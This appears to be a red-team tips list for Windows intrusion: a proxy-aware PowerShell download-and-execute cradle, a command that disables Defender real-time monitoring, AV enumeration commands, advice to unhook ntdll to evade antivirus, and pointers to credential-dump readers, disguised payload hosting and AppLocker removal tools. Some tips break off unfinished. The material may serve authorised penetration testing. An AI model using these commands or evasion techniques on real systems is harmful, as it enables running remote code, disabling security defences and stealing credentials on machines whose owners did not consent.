#1 The standard powershell downloadcradle (IEX New-Object….) is NOT proxy aware. A far superior alternative is the following one liner:
$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")
#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers… They are often overlooked, and can easily be exploited for RCE (think potato exploits). NETSPI is an expert in DB exploitation. https://github.com/NetSPI I highly recommend powerupsql if you can manage to load powershell undetected.
#3 The command to list AV products is
powershell: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct WMIC: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
#4 Only got CIFS TGS? you can still use
sc to enable/disable/register new services on remote computers.
#5 The command to disable realtimonitoring is
Set-MpPreference -DisableRealtimeMonitoring $true
This is NOT opsec safe (duh).
#6 unhook ntdll.dll and all your AV problems go away 🙂
A good starting point is
#7 In my honest opinion, https://github.com/skelsec/pypykatz is superior to mimikatz itself for reading out dumps and registry keys. It’s python based so works cross OS. pretty damn sweet.
#8. Don’t use SimpleHTTPServer anymore, use the much better UpDog instead (it has uploading functionalities!) https://github.com/sc0tfree/updog
#9. Pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to prevent snooping eyes. https://github.com/kgretzky/pwndrop
#10. Need a powershell web server for some reason? use this one! https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466
it has script execution,command execution, and download functionalities
#11. You need quote escapes in powershell? there are a few different options, either use backslash (\) to escape quotes or use encodedcommands instead. pro tip, chaining powershell commands can be done, even incoded by just using “;” as a separator for commands. ex.
#12. Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? use .bat files or .cmd files like so:
@echo off powershell.exe -noexit ## or any other powershell command you need.
#13. powershell script to c#? no problem! https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs
#14. need to get rid of applocker (after you bypassed it initially)? https://github.com/api0cradle/AppLocker-Stuff
#15. Using Costura to package your c#? @cobbr says “Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies”
#16. @0gtweet tweeted an interesting thing: ” an undocumented -encodedarguments PowerShell parameter. It may be shortened to “ea” or “encodeda”.
#18. Ever needed to know what regkey is being edited by mdm or gpo? check this site: https://getadmx.com/?Category=Windows_10_2016
#19. You’ll need local admin rights to change registry keys in HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\
#20. you can pass cmd args from explorer window, for example
#21 when using GadgetToJScript, use x86 payloads! also specifying the assembly is easier than compiling the CSharp as it imports the correct DLL’s automagically